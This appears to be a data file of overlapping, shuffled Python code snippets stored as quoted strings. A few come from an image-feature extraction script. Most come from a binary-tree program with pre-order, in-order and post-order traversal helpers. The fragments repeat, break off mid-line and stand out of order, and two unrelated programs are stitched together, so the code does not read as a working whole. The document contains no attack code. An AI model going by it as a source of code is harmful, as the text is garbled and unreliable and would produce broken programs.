enumerate(dir_child_list): names = [] img_names", "'/' + img_path.split('/')[-1] + '_img_names.txt', 'w') as name_file: name_file.writelines(names) print \"extracting feature from", ":param target_dir: endswith / :return: ''' copyFiles('./test_2000.txt', target_dir) feature_generator_sift_color(dir_img=os.path.abspath(os.path.join(os.path.dirname(target_dir), '../'))) if __name__ ==", "+ \".jpg\") img_names = get_all_files_suffix(img_path) print len(img_names) fp_pick = '/usr/local/bin/videofpget_bow_hash ' + img_path" ]
[ "walk of a tree (left, right, parent)\"\"\" def post_order_walk(node, result: list, left: Callable,", "q.put(node) tree.append(node) if current_parent is not None: if (is_full(current_parent)): current_parent = q.get(block=False) add_child(current_parent,", "= [] post_order_walk(tree[0], post_order_walk_result, left=lambda node: node[\"left\"] if \"left\" in node else None,", "parent: Callable): if node is not None: result.append(node) if left(node) is not None:", "import Callable from queue import Queue \"\"\"A type of depth-first walk of a", "print(\"%s <- %s: %s %s\" % (parent, node[\"data\"], left, right)) def print_tree_minimal(tree: list):", "\"data\" : data } return node def make_tree(items: list): tree = [] q", "left=lambda node: node[\"left\"] if \"left\" in node else None, right=lambda node: node[\"right\"] if", "parent=lambda node: node[\"parent\"] if \"parent\" in node else None) print_tree_minimal(in_order_walk_result) post_order_walk_result = []", "current_parent = q.get(block=False) if q.empty() is False else None for item in items:", "list, left: Callable, right: Callable, parent: Callable): if node is not None: if", "parent) result.append(node) def add_child(node, child_node): if not \"left\" in node: node[\"left\"] = child_node", "left = node[\"left\"][\"data\"] if \"left\" in node else None right = node[\"right\"][\"data\"] if", "node else None, parent=lambda node: node[\"parent\"] if \"parent\" in node else None) print_tree_minimal(in_order_walk_result)", "print(\"%s\" % node[\"data\"], end=' ') print() def main(): tree = make_tree([25, 23, 22,", "in node def make_node(data): node = { \"data\" : data } return node", "in tree: print(\"%s\" % node[\"data\"], end=' ') print() def main(): tree = make_tree([25,", "\"left\" in node and \"right\" in node def make_node(data): node = { \"data\"", "right, parent) if right(node) is not None: pre_order_walk(right(node), result, left, right, parent) \"\"\"A", "15, 16, 10, 9, 19, 18, 14, 7, 4, 13, 11]) 
print_tree(tree) pre_order_walk_result", "None right = node[\"right\"][\"data\"] if \"right\" in node else None print(\"%s <- %s:", "if not \"left\" in node: node[\"left\"] = child_node child_node[\"parent\"] = node elif not", "walk of a tree (parent, left, right)\"\"\" def pre_order_walk(node, result: list, left: Callable,", "not None: result.append(node) if left(node) is not None: pre_order_walk(left(node), result, left, right, parent)", "print_tree_minimal(pre_order_walk_result) in_order_walk_result = [] in_order_walk(tree[0], in_order_walk_result, left=lambda node: node[\"left\"] if \"left\" in node", "q = Queue() current_parent = q.get(block=False) if q.empty() is False else None for", "if q.empty() is False else None for item in items: print('DEBUG: adding item", "print_tree(tree: list): for node in tree: parent = node[\"parent\"][\"data\"] if \"parent\" in node", "node: node[\"parent\"] if \"parent\" in node else None) print_tree_minimal(in_order_walk_result) post_order_walk_result = [] post_order_walk(tree[0],", "Callable): if node is not None: if left(node) is not None: in_order_walk(left(node), result,", "return \"left\" in node and \"right\" in node def make_node(data): node = {", "None) print_tree_minimal(in_order_walk_result) post_order_walk_result = [] post_order_walk(tree[0], post_order_walk_result, left=lambda node: node[\"left\"] if \"left\" in", "node else None right = node[\"right\"][\"data\"] if \"right\" in node else None print(\"%s", "result.append(node) def add_child(node, child_node): if not \"left\" in node: node[\"left\"] = child_node child_node[\"parent\"]", "of a tree (parent, left, right)\"\"\" def pre_order_walk(node, result: list, left: Callable, right:", "node: node[\"right\"] = child_node child_node[\"parent\"] = node else: raise Exception(\"parent node is full\")", "not None: if left(node) is not None: post_order_walk(left(node), result, left, right, parent) if", "None: pre_order_walk(right(node), result, left, right, parent) 
\"\"\"A type of depth-first walk of a", "node[\"right\"][\"data\"] if \"right\" in node else None print(\"%s <- %s: %s %s\" %", "9, 19, 18, 14, 7, 4, 13, 11]) print_tree(tree) pre_order_walk_result = [] pre_order_walk(tree[0],", "else None, parent=lambda node: node[\"parent\"] if \"parent\" in node else None) print_tree_minimal(in_order_walk_result) post_order_walk_result", "not None: pre_order_walk(right(node), result, left, right, parent) \"\"\"A type of depth-first walk of", "in tree: parent = node[\"parent\"][\"data\"] if \"parent\" in node else None left =", "return tree def print_tree(tree: list): for node in tree: parent = node[\"parent\"][\"data\"] if", "node: node[\"left\"] if \"left\" in node else None, right=lambda node: node[\"right\"] if \"right\"", "queue import Queue \"\"\"A type of depth-first walk of a tree (parent, left,", "post_order_walk(node, result: list, left: Callable, right: Callable, parent: Callable): if node is not", "[] post_order_walk(tree[0], post_order_walk_result, left=lambda node: node[\"left\"] if \"left\" in node else None, right=lambda", "of depth-first walk of a tree (left, right, parent)\"\"\" def post_order_walk(node, result: list,", "full\") def is_full(node) -> bool: return \"left\" in node and \"right\" in node", "def main(): tree = make_tree([25, 23, 22, 21, 12, 20, 17, 15, 16,", "tree def print_tree(tree: list): for node in tree: parent = node[\"parent\"][\"data\"] if \"parent\"", "from typing import Callable from queue import Queue \"\"\"A type of depth-first walk", "if \"right\" in node else None, parent=lambda node: node[\"parent\"] if \"parent\" in node", "is full\") def is_full(node) -> bool: return \"left\" in node and \"right\" in", "None: if left(node) is not None: in_order_walk(left(node), result, left, right, parent) result.append(node) if", "current_parent is not None: if (is_full(current_parent)): current_parent = q.get(block=False) add_child(current_parent, node) else: current_parent", "\"parent\" in node 
else None) print_tree_minimal(pre_order_walk_result) in_order_walk_result = [] in_order_walk(tree[0], in_order_walk_result, left=lambda node:", "post_order_walk_result, left=lambda node: node[\"left\"] if \"left\" in node else None, right=lambda node: node[\"right\"]", "pre_order_walk_result = [] pre_order_walk(tree[0], pre_order_walk_result, left=lambda node: node[\"left\"] if \"left\" in node else", "node[\"data\"], left, right)) def print_tree_minimal(tree: list): for node in tree: print(\"%s\" % node[\"data\"],", "right: Callable, parent: Callable): if node is not None: result.append(node) if left(node) is", "node is not None: result.append(node) if left(node) is not None: pre_order_walk(left(node), result, left,", "\"right\" in node else None print(\"%s <- %s: %s %s\" % (parent, node[\"data\"],", "= Queue() current_parent = q.get(block=False) if q.empty() is False else None for item", "(left, right, parent)\"\"\" def post_order_walk(node, result: list, left: Callable, right: Callable, parent: Callable):", "in node else None, parent=lambda node: node[\"parent\"] if \"parent\" in node else None)", "parent: Callable): if node is not None: if left(node) is not None: post_order_walk(left(node),", "False else None for item in items: print('DEBUG: adding item %s' % item)", "result, left, right, parent) \"\"\"A type of depth-first walk of a tree (left,", "type of depth-first walk of a tree (parent, left, right)\"\"\" def pre_order_walk(node, result:", "print('DEBUG: adding item %s' % item) node = make_node(item) q.put(node) tree.append(node) if current_parent", "node is not None: if left(node) is not None: post_order_walk(left(node), result, left, right,", "of depth-first walk of a tree (left, parent, right)\"\"\" def in_order_walk(node, result: list,", "if \"right\" in node else None print(\"%s <- %s: %s %s\" % (parent,", "[] q = Queue() current_parent = q.get(block=False) if q.empty() is False else None", "None, parent=lambda node: node[\"parent\"] if \"parent\" in 
node else None) print_tree_minimal(pre_order_walk_result) in_order_walk_result =", "and \"right\" in node def make_node(data): node = { \"data\" : data }", ": data } return node def make_tree(items: list): tree = [] q =", "if right(node) is not None: in_order_walk(right(node), result, left, right, parent) \"\"\"A type of", "list): for node in tree: parent = node[\"parent\"][\"data\"] if \"parent\" in node else", "else None left = node[\"left\"][\"data\"] if \"left\" in node else None right =", "of a tree (left, parent, right)\"\"\" def in_order_walk(node, result: list, left: Callable, right:", "= child_node child_node[\"parent\"] = node elif not \"right\" in node: node[\"right\"] = child_node", "{ \"data\" : data } return node def make_tree(items: list): tree = []", "4, 13, 11]) print_tree(tree) pre_order_walk_result = [] pre_order_walk(tree[0], pre_order_walk_result, left=lambda node: node[\"left\"] if", "None left = node[\"left\"][\"data\"] if \"left\" in node else None right = node[\"right\"][\"data\"]", "20, 17, 15, 16, 10, 9, 19, 18, 14, 7, 4, 13, 11])", "in node else None right = node[\"right\"][\"data\"] if \"right\" in node else None", "bool: return \"left\" in node and \"right\" in node def make_node(data): node =", "else: current_parent = q.get(block=False) return tree def print_tree(tree: list): for node in tree:", "node[\"left\"][\"data\"] if \"left\" in node else None right = node[\"right\"][\"data\"] if \"right\" in", "(parent, left, right)\"\"\" def pre_order_walk(node, result: list, left: Callable, right: Callable, parent: Callable):", "in node else None) print_tree_minimal(pre_order_walk_result) in_order_walk_result = [] in_order_walk(tree[0], in_order_walk_result, left=lambda node: node[\"left\"]", "elif not \"right\" in node: node[\"right\"] = child_node child_node[\"parent\"] = node else: raise", "if node is not None: result.append(node) if left(node) is not None: pre_order_walk(left(node), result,", "a tree (parent, left, right)\"\"\" def 
pre_order_walk(node, result: list, left: Callable, right: Callable,", "else None for item in items: print('DEBUG: adding item %s' % item) node", "} return node def make_tree(items: list): tree = [] q = Queue() current_parent", "add_child(node, child_node): if not \"left\" in node: node[\"left\"] = child_node child_node[\"parent\"] = node", "right, parent) \"\"\"A type of depth-first walk of a tree (left, parent, right)\"\"\"", "18, 14, 7, 4, 13, 11]) print_tree(tree) pre_order_walk_result = [] pre_order_walk(tree[0], pre_order_walk_result, left=lambda", "result, left, right, parent) result.append(node) def add_child(node, child_node): if not \"left\" in node:", "13, 11]) print_tree(tree) pre_order_walk_result = [] pre_order_walk(tree[0], pre_order_walk_result, left=lambda node: node[\"left\"] if \"left\"", "None: if left(node) is not None: post_order_walk(left(node), result, left, right, parent) if right(node)", "q.get(block=False) return tree def print_tree(tree: list): for node in tree: parent = node[\"parent\"][\"data\"]", "16, 10, 9, 19, 18, 14, 7, 4, 13, 11]) print_tree(tree) pre_order_walk_result =", "if \"left\" in node else None, right=lambda node: node[\"right\"] if \"right\" in node", "in_order_walk_result, left=lambda node: node[\"left\"] if \"left\" in node else None, right=lambda node: node[\"right\"]", "= node[\"right\"][\"data\"] if \"right\" in node else None print(\"%s <- %s: %s %s\"", "left, right, parent) if right(node) is not None: post_order_walk(right(node), result, left, right, parent)", "14, 7, 4, 13, 11]) print_tree(tree) pre_order_walk_result = [] pre_order_walk(tree[0], pre_order_walk_result, left=lambda node:", "make_node(item) q.put(node) tree.append(node) if current_parent is not None: if (is_full(current_parent)): current_parent = q.get(block=False)", "node else None left = node[\"left\"][\"data\"] if \"left\" in node else None right", "in node: node[\"left\"] = child_node child_node[\"parent\"] = node elif not \"right\" in node:", "= 
q.get(block=False) if q.empty() is False else None for item in items: print('DEBUG:", "None for item in items: print('DEBUG: adding item %s' % item) node =", "node def make_node(data): node = { \"data\" : data } return node def", "Callable): if node is not None: if left(node) is not None: post_order_walk(left(node), result,", "is not None: in_order_walk(left(node), result, left, right, parent) result.append(node) if right(node) is not", "if current_parent is not None: if (is_full(current_parent)): current_parent = q.get(block=False) add_child(current_parent, node) else:", "def print_tree_minimal(tree: list): for node in tree: print(\"%s\" % node[\"data\"], end=' ') print()", "right, parent) result.append(node) if right(node) is not None: in_order_walk(right(node), result, left, right, parent)", "%s' % item) node = make_node(item) q.put(node) tree.append(node) if current_parent is not None:", "is False else None for item in items: print('DEBUG: adding item %s' %", "not None: post_order_walk(left(node), result, left, right, parent) if right(node) is not None: post_order_walk(right(node),", "for node in tree: parent = node[\"parent\"][\"data\"] if \"parent\" in node else None", "if node is not None: if left(node) is not None: in_order_walk(left(node), result, left,", "12, 20, 17, 15, 16, 10, 9, 19, 18, 14, 7, 4, 13,", "pre_order_walk(left(node), result, left, right, parent) if right(node) is not None: pre_order_walk(right(node), result, left,", "else None right = node[\"right\"][\"data\"] if \"right\" in node else None print(\"%s <-", "in node else None) print_tree_minimal(in_order_walk_result) post_order_walk_result = [] post_order_walk(tree[0], post_order_walk_result, left=lambda node: node[\"left\"]", "if right(node) is not None: post_order_walk(right(node), result, left, right, parent) result.append(node) def add_child(node,", "else None, right=lambda node: node[\"right\"] if \"right\" in node else None, parent=lambda node:", "node else None, parent=lambda node: 
node[\"parent\"] if \"parent\" in node else None) print_tree_minimal(pre_order_walk_result)", "node[\"parent\"][\"data\"] if \"parent\" in node else None left = node[\"left\"][\"data\"] if \"left\" in", "is not None: pre_order_walk(right(node), result, left, right, parent) \"\"\"A type of depth-first walk", "(left, parent, right)\"\"\" def in_order_walk(node, result: list, left: Callable, right: Callable, parent: Callable):", "node: node[\"right\"] if \"right\" in node else None, parent=lambda node: node[\"parent\"] if \"parent\"", "left: Callable, right: Callable, parent: Callable): if node is not None: result.append(node) if", "def pre_order_walk(node, result: list, left: Callable, right: Callable, parent: Callable): if node is", "') print() def main(): tree = make_tree([25, 23, 22, 21, 12, 20, 17,", "= [] in_order_walk(tree[0], in_order_walk_result, left=lambda node: node[\"left\"] if \"left\" in node else None,", "list): tree = [] q = Queue() current_parent = q.get(block=False) if q.empty() is", "\"parent\" in node else None left = node[\"left\"][\"data\"] if \"left\" in node else", "type of depth-first walk of a tree (left, parent, right)\"\"\" def in_order_walk(node, result:", "else None) print_tree_minimal(in_order_walk_result) post_order_walk_result = [] post_order_walk(tree[0], post_order_walk_result, left=lambda node: node[\"left\"] if \"left\"", "21, 12, 20, 17, 15, 16, 10, 9, 19, 18, 14, 7, 4,", "is not None: in_order_walk(right(node), result, left, right, parent) \"\"\"A type of depth-first walk", "= q.get(block=False) add_child(current_parent, node) else: current_parent = q.get(block=False) return tree def print_tree(tree: list):", "\"left\" in node else None, right=lambda node: node[\"right\"] if \"right\" in node else", "node else None, right=lambda node: node[\"right\"] if \"right\" in node else None, parent=lambda", "post_order_walk(left(node), result, left, right, parent) if right(node) is not None: post_order_walk(right(node), result, left,", 
"type of depth-first walk of a tree (left, right, parent)\"\"\" def post_order_walk(node, result:", "\"\"\"A type of depth-first walk of a tree (left, parent, right)\"\"\" def in_order_walk(node,", "node else None) print_tree_minimal(pre_order_walk_result) in_order_walk_result = [] in_order_walk(tree[0], in_order_walk_result, left=lambda node: node[\"left\"] if", "node[\"data\"], end=' ') print() def main(): tree = make_tree([25, 23, 22, 21, 12,", "tree = make_tree([25, 23, 22, 21, 12, 20, 17, 15, 16, 10, 9,", "else None, parent=lambda node: node[\"parent\"] if \"parent\" in node else None) print_tree_minimal(post_order_walk_result) main()", "%s %s\" % (parent, node[\"data\"], left, right)) def print_tree_minimal(tree: list): for node in", "tree = [] q = Queue() current_parent = q.get(block=False) if q.empty() is False", "Callable, parent: Callable): if node is not None: if left(node) is not None:", "parent)\"\"\" def post_order_walk(node, result: list, left: Callable, right: Callable, parent: Callable): if node", "% node[\"data\"], end=' ') print() def main(): tree = make_tree([25, 23, 22, 21,", "print_tree_minimal(tree: list): for node in tree: print(\"%s\" % node[\"data\"], end=' ') print() def", "not None: in_order_walk(right(node), result, left, right, parent) \"\"\"A type of depth-first walk of", "def print_tree(tree: list): for node in tree: parent = node[\"parent\"][\"data\"] if \"parent\" in", "in node else None left = node[\"left\"][\"data\"] if \"left\" in node else None", "import Queue \"\"\"A type of depth-first walk of a tree (parent, left, right)\"\"\"", "make_tree(items: list): tree = [] q = Queue() current_parent = q.get(block=False) if q.empty()", "q.get(block=False) add_child(current_parent, node) else: current_parent = q.get(block=False) return tree def print_tree(tree: list): for", "None, parent=lambda node: node[\"parent\"] if \"parent\" in node else None) print_tree_minimal(in_order_walk_result) post_order_walk_result =", "typing import 
Callable from queue import Queue \"\"\"A type of depth-first walk of", "in_order_walk(node, result: list, left: Callable, right: Callable, parent: Callable): if node is not", "item) node = make_node(item) q.put(node) tree.append(node) if current_parent is not None: if (is_full(current_parent)):", "node[\"right\"] = child_node child_node[\"parent\"] = node else: raise Exception(\"parent node is full\") def", "Callable, right: Callable, parent: Callable): if node is not None: if left(node) is", "11]) print_tree(tree) pre_order_walk_result = [] pre_order_walk(tree[0], pre_order_walk_result, left=lambda node: node[\"left\"] if \"left\" in", "= q.get(block=False) return tree def print_tree(tree: list): for node in tree: parent =", "if left(node) is not None: in_order_walk(left(node), result, left, right, parent) result.append(node) if right(node)", "in_order_walk(left(node), result, left, right, parent) result.append(node) if right(node) is not None: in_order_walk(right(node), result,", "raise Exception(\"parent node is full\") def is_full(node) -> bool: return \"left\" in node", "node else None print(\"%s <- %s: %s %s\" % (parent, node[\"data\"], left, right))", "not None: pre_order_walk(left(node), result, left, right, parent) if right(node) is not None: pre_order_walk(right(node),", "7, 4, 13, 11]) print_tree(tree) pre_order_walk_result = [] pre_order_walk(tree[0], pre_order_walk_result, left=lambda node: node[\"left\"]", "tree (left, parent, right)\"\"\" def in_order_walk(node, result: list, left: Callable, right: Callable, parent:", "23, 22, 21, 12, 20, 17, 15, 16, 10, 9, 19, 18, 14,", "parent: Callable): if node is not None: if left(node) is not None: in_order_walk(left(node),", "22, 21, 12, 20, 17, 15, 16, 10, 9, 19, 18, 14, 7,", "def make_node(data): node = { \"data\" : data } return node def make_tree(items:", "result, left, right, parent) result.append(node) if right(node) is not None: in_order_walk(right(node), result, left,", "right)\"\"\" def 
in_order_walk(node, result: list, left: Callable, right: Callable, parent: Callable): if node", "= node elif not \"right\" in node: node[\"right\"] = child_node child_node[\"parent\"] = node", "None: if (is_full(current_parent)): current_parent = q.get(block=False) add_child(current_parent, node) else: current_parent = q.get(block=False) return", "is not None: result.append(node) if left(node) is not None: pre_order_walk(left(node), result, left, right,", "else: raise Exception(\"parent node is full\") def is_full(node) -> bool: return \"left\" in", "%s: %s %s\" % (parent, node[\"data\"], left, right)) def print_tree_minimal(tree: list): for node", "not \"left\" in node: node[\"left\"] = child_node child_node[\"parent\"] = node elif not \"right\"", "left, right, parent) result.append(node) def add_child(node, child_node): if not \"left\" in node: node[\"left\"]", "def post_order_walk(node, result: list, left: Callable, right: Callable, parent: Callable): if node is", "return node def make_tree(items: list): tree = [] q = Queue() current_parent =", "tree: parent = node[\"parent\"][\"data\"] if \"parent\" in node else None left = node[\"left\"][\"data\"]", "else None) print_tree_minimal(pre_order_walk_result) in_order_walk_result = [] in_order_walk(tree[0], in_order_walk_result, left=lambda node: node[\"left\"] if \"left\"", "current_parent = q.get(block=False) return tree def print_tree(tree: list): for node in tree: parent", "of depth-first walk of a tree (parent, left, right)\"\"\" def pre_order_walk(node, result: list,", "of a tree (left, right, parent)\"\"\" def post_order_walk(node, result: list, left: Callable, right:", "node[\"parent\"] if \"parent\" in node else None) print_tree_minimal(in_order_walk_result) post_order_walk_result = [] post_order_walk(tree[0], post_order_walk_result,", "left, right, parent) result.append(node) if right(node) is not None: in_order_walk(right(node), result, left, right,", "depth-first walk of a tree (left, parent, right)\"\"\" 
def in_order_walk(node, result: list, left:", "left(node) is not None: in_order_walk(left(node), result, left, right, parent) result.append(node) if right(node) is", "\"\"\"A type of depth-first walk of a tree (left, right, parent)\"\"\" def post_order_walk(node,", "node = { \"data\" : data } return node def make_tree(items: list): tree", "q.empty() is False else None for item in items: print('DEBUG: adding item %s'", "Callable): if node is not None: result.append(node) if left(node) is not None: pre_order_walk(left(node),", "parent) if right(node) is not None: post_order_walk(right(node), result, left, right, parent) result.append(node) def", "None: post_order_walk(right(node), result, left, right, parent) result.append(node) def add_child(node, child_node): if not \"left\"", "for item in items: print('DEBUG: adding item %s' % item) node = make_node(item)", "node = make_node(item) q.put(node) tree.append(node) if current_parent is not None: if (is_full(current_parent)): current_parent", "parent) \"\"\"A type of depth-first walk of a tree (left, right, parent)\"\"\" def", "in node: node[\"right\"] = child_node child_node[\"parent\"] = node else: raise Exception(\"parent node is", "left(node) is not None: post_order_walk(left(node), result, left, right, parent) if right(node) is not", "node: node[\"left\"] = child_node child_node[\"parent\"] = node elif not \"right\" in node: node[\"right\"]", "\"right\" in node: node[\"right\"] = child_node child_node[\"parent\"] = node else: raise Exception(\"parent node", "parent, right)\"\"\" def in_order_walk(node, result: list, left: Callable, right: Callable, parent: Callable): if", "% (parent, node[\"data\"], left, right)) def print_tree_minimal(tree: list): for node in tree: print(\"%s\"", "child_node child_node[\"parent\"] = node else: raise Exception(\"parent node is full\") def is_full(node) ->", "if (is_full(current_parent)): current_parent = q.get(block=False) add_child(current_parent, node) else: current_parent = 
q.get(block=False) return tree", "is_full(node) -> bool: return \"left\" in node and \"right\" in node def make_node(data):", "None) print_tree_minimal(pre_order_walk_result) in_order_walk_result = [] in_order_walk(tree[0], in_order_walk_result, left=lambda node: node[\"left\"] if \"left\" in", "parent=lambda node: node[\"parent\"] if \"parent\" in node else None) print_tree_minimal(pre_order_walk_result) in_order_walk_result = []", "for node in tree: print(\"%s\" % node[\"data\"], end=' ') print() def main(): tree", "node else: raise Exception(\"parent node is full\") def is_full(node) -> bool: return \"left\"", "is not None: post_order_walk(left(node), result, left, right, parent) if right(node) is not None:", "if left(node) is not None: pre_order_walk(left(node), result, left, right, parent) if right(node) is", "node[\"parent\"] if \"parent\" in node else None) print_tree_minimal(pre_order_walk_result) in_order_walk_result = [] in_order_walk(tree[0], in_order_walk_result,", "node is full\") def is_full(node) -> bool: return \"left\" in node and \"right\"", "right(node) is not None: in_order_walk(right(node), result, left, right, parent) \"\"\"A type of depth-first", "not None: in_order_walk(left(node), result, left, right, parent) result.append(node) if right(node) is not None:", "is not None: post_order_walk(right(node), result, left, right, parent) result.append(node) def add_child(node, child_node): if", "\"left\" in node: node[\"left\"] = child_node child_node[\"parent\"] = node elif not \"right\" in", "= node else: raise Exception(\"parent node is full\") def is_full(node) -> bool: return", "child_node[\"parent\"] = node elif not \"right\" in node: node[\"right\"] = child_node child_node[\"parent\"] =", "None: result.append(node) if left(node) is not None: pre_order_walk(left(node), result, left, right, parent) if", "left, right, parent) if right(node) is not None: pre_order_walk(right(node), result, left, right, parent)", "left, right, parent) \"\"\"A type 
of depth-first walk of a tree (left, parent,", "from queue import Queue \"\"\"A type of depth-first walk of a tree (parent,", "node else None) print_tree_minimal(in_order_walk_result) post_order_walk_result = [] post_order_walk(tree[0], post_order_walk_result, left=lambda node: node[\"left\"] if", "<- %s: %s %s\" % (parent, node[\"data\"], left, right)) def print_tree_minimal(tree: list): for", "if node is not None: if left(node) is not None: post_order_walk(left(node), result, left,", "node[\"left\"] = child_node child_node[\"parent\"] = node elif not \"right\" in node: node[\"right\"] =", "= node[\"parent\"][\"data\"] if \"parent\" in node else None left = node[\"left\"][\"data\"] if \"left\"", "node[\"left\"] if \"left\" in node else None, right=lambda node: node[\"right\"] if \"right\" in", "None: in_order_walk(right(node), result, left, right, parent) \"\"\"A type of depth-first walk of a", "None print(\"%s <- %s: %s %s\" % (parent, node[\"data\"], left, right)) def print_tree_minimal(tree:", "child_node): if not \"left\" in node: node[\"left\"] = child_node child_node[\"parent\"] = node elif", "left: Callable, right: Callable, parent: Callable): if node is not None: if left(node)", "Callable, right: Callable, parent: Callable): if node is not None: result.append(node) if left(node)", "None: in_order_walk(left(node), result, left, right, parent) result.append(node) if right(node) is not None: in_order_walk(right(node),", "right(node) is not None: pre_order_walk(right(node), result, left, right, parent) \"\"\"A type of depth-first", "tree (left, right, parent)\"\"\" def post_order_walk(node, result: list, left: Callable, right: Callable, parent:", "post_order_walk(tree[0], post_order_walk_result, left=lambda node: node[\"left\"] if \"left\" in node else None, right=lambda node:", "None: post_order_walk(left(node), result, left, right, parent) if right(node) is not None: post_order_walk(right(node), result,", "result.append(node) if left(node) is not None: 
pre_order_walk(left(node), result, left, right, parent) if right(node)", "list, left: Callable, right: Callable, parent: Callable): if node is not None: result.append(node)", "def in_order_walk(node, result: list, left: Callable, right: Callable, parent: Callable): if node is", "in node else None, right=lambda node: node[\"right\"] if \"right\" in node else None,", "node) else: current_parent = q.get(block=False) return tree def print_tree(tree: list): for node in", "node: node[\"parent\"] if \"parent\" in node else None) print_tree_minimal(pre_order_walk_result) in_order_walk_result = [] in_order_walk(tree[0],", "not None: if (is_full(current_parent)): current_parent = q.get(block=False) add_child(current_parent, node) else: current_parent = q.get(block=False)", "post_order_walk(right(node), result, left, right, parent) result.append(node) def add_child(node, child_node): if not \"left\" in", "right, parent) \"\"\"A type of depth-first walk of a tree (left, right, parent)\"\"\"", "not None: if left(node) is not None: in_order_walk(left(node), result, left, right, parent) result.append(node)", "\"left\" in node else None right = node[\"right\"][\"data\"] if \"right\" in node else", "left(node) is not None: pre_order_walk(left(node), result, left, right, parent) if right(node) is not", "a tree (left, parent, right)\"\"\" def in_order_walk(node, result: list, left: Callable, right: Callable,", "= [] pre_order_walk(tree[0], pre_order_walk_result, left=lambda node: node[\"left\"] if \"left\" in node else None,", "node in tree: parent = node[\"parent\"][\"data\"] if \"parent\" in node else None left", "item in items: print('DEBUG: adding item %s' % item) node = make_node(item) q.put(node)", "right, parent)\"\"\" def post_order_walk(node, result: list, left: Callable, right: Callable, parent: Callable): if", "not None: post_order_walk(right(node), result, left, right, parent) result.append(node) def add_child(node, child_node): if not", "(parent, node[\"data\"], left, 
right)) def print_tree_minimal(tree: list): for node in tree: print(\"%s\" %", "result, left, right, parent) if right(node) is not None: post_order_walk(right(node), result, left, right,", "= { \"data\" : data } return node def make_tree(items: list): tree =", "-> bool: return \"left\" in node and \"right\" in node def make_node(data): node", "make_node(data): node = { \"data\" : data } return node def make_tree(items: list):", "None, right=lambda node: node[\"right\"] if \"right\" in node else None, parent=lambda node: node[\"parent\"]", "print() def main(): tree = make_tree([25, 23, 22, 21, 12, 20, 17, 15,", "node def make_tree(items: list): tree = [] q = Queue() current_parent = q.get(block=False)", "node and \"right\" in node def make_node(data): node = { \"data\" : data", "walk of a tree (left, parent, right)\"\"\" def in_order_walk(node, result: list, left: Callable,", "Callable from queue import Queue \"\"\"A type of depth-first walk of a tree", "right)\"\"\" def pre_order_walk(node, result: list, left: Callable, right: Callable, parent: Callable): if node", "right=lambda node: node[\"right\"] if \"right\" in node else None, parent=lambda node: node[\"parent\"] if", "right = node[\"right\"][\"data\"] if \"right\" in node else None print(\"%s <- %s: %s", "if \"parent\" in node else None left = node[\"left\"][\"data\"] if \"left\" in node", "right)) def print_tree_minimal(tree: list): for node in tree: print(\"%s\" % node[\"data\"], end=' ')", "pre_order_walk(tree[0], pre_order_walk_result, left=lambda node: node[\"left\"] if \"left\" in node else None, right=lambda node:", "current_parent = q.get(block=False) add_child(current_parent, node) else: current_parent = q.get(block=False) return tree def print_tree(tree:", "= node[\"left\"][\"data\"] if \"left\" in node else None right = node[\"right\"][\"data\"] if \"right\"", "pre_order_walk_result, left=lambda node: node[\"left\"] if \"left\" in node else None, right=lambda node: node[\"right\"]", "is not None: 
pre_order_walk(left(node), result, left, right, parent) if right(node) is not None:", "[] pre_order_walk(tree[0], pre_order_walk_result, left=lambda node: node[\"left\"] if \"left\" in node else None, right=lambda", "print_tree(tree) pre_order_walk_result = [] pre_order_walk(tree[0], pre_order_walk_result, left=lambda node: node[\"left\"] if \"left\" in node", "node elif not \"right\" in node: node[\"right\"] = child_node child_node[\"parent\"] = node else:", "is not None: if left(node) is not None: in_order_walk(left(node), result, left, right, parent)", "left, right, parent) \"\"\"A type of depth-first walk of a tree (left, right,", "\"\"\"A type of depth-first walk of a tree (parent, left, right)\"\"\" def pre_order_walk(node,", "parent) if right(node) is not None: pre_order_walk(right(node), result, left, right, parent) \"\"\"A type", "right, parent) result.append(node) def add_child(node, child_node): if not \"left\" in node: node[\"left\"] =", "else None, parent=lambda node: node[\"parent\"] if \"parent\" in node else None) print_tree_minimal(pre_order_walk_result) in_order_walk_result", "= make_tree([25, 23, 22, 21, 12, 20, 17, 15, 16, 10, 9, 19,", "parent = node[\"parent\"][\"data\"] if \"parent\" in node else None left = node[\"left\"][\"data\"] if", "is not None: if (is_full(current_parent)): current_parent = q.get(block=False) add_child(current_parent, node) else: current_parent =", "add_child(current_parent, node) else: current_parent = q.get(block=False) return tree def print_tree(tree: list): for node", "right, parent) if right(node) is not None: post_order_walk(right(node), result, left, right, parent) result.append(node)", "left, right)) def print_tree_minimal(tree: list): for node in tree: print(\"%s\" % node[\"data\"], end='", "item %s' % item) node = make_node(item) q.put(node) tree.append(node) if current_parent is not", "items: print('DEBUG: adding item %s' % item) node = make_node(item) q.put(node) tree.append(node) if", "in node and \"right\" 
in node def make_node(data): node = { \"data\" :", "%s\" % (parent, node[\"data\"], left, right)) def print_tree_minimal(tree: list): for node in tree:", "else None print(\"%s <- %s: %s %s\" % (parent, node[\"data\"], left, right)) def", "right(node) is not None: post_order_walk(right(node), result, left, right, parent) result.append(node) def add_child(node, child_node):", "a tree (left, right, parent)\"\"\" def post_order_walk(node, result: list, left: Callable, right: Callable,", "main(): tree = make_tree([25, 23, 22, 21, 12, 20, 17, 15, 16, 10,", "in items: print('DEBUG: adding item %s' % item) node = make_node(item) q.put(node) tree.append(node)", "data } return node def make_tree(items: list): tree = [] q = Queue()", "result: list, left: Callable, right: Callable, parent: Callable): if node is not None:", "list): for node in tree: print(\"%s\" % node[\"data\"], end=' ') print() def main():", "def make_tree(items: list): tree = [] q = Queue() current_parent = q.get(block=False) if", "end=' ') print() def main(): tree = make_tree([25, 23, 22, 21, 12, 20,", "tree.append(node) if current_parent is not None: if (is_full(current_parent)): current_parent = q.get(block=False) add_child(current_parent, node)", "left, right)\"\"\" def pre_order_walk(node, result: list, left: Callable, right: Callable, parent: Callable): if", "if \"parent\" in node else None) print_tree_minimal(pre_order_walk_result) in_order_walk_result = [] in_order_walk(tree[0], in_order_walk_result, left=lambda", "[] in_order_walk(tree[0], in_order_walk_result, left=lambda node: node[\"left\"] if \"left\" in node else None, right=lambda", "pre_order_walk(node, result: list, left: Callable, right: Callable, parent: Callable): if node is not", "node in tree: print(\"%s\" % node[\"data\"], end=' ') print() def main(): tree =", "in_order_walk_result = [] in_order_walk(tree[0], in_order_walk_result, left=lambda node: node[\"left\"] if \"left\" in node else", "in node else None print(\"%s <- %s: %s %s\" % 
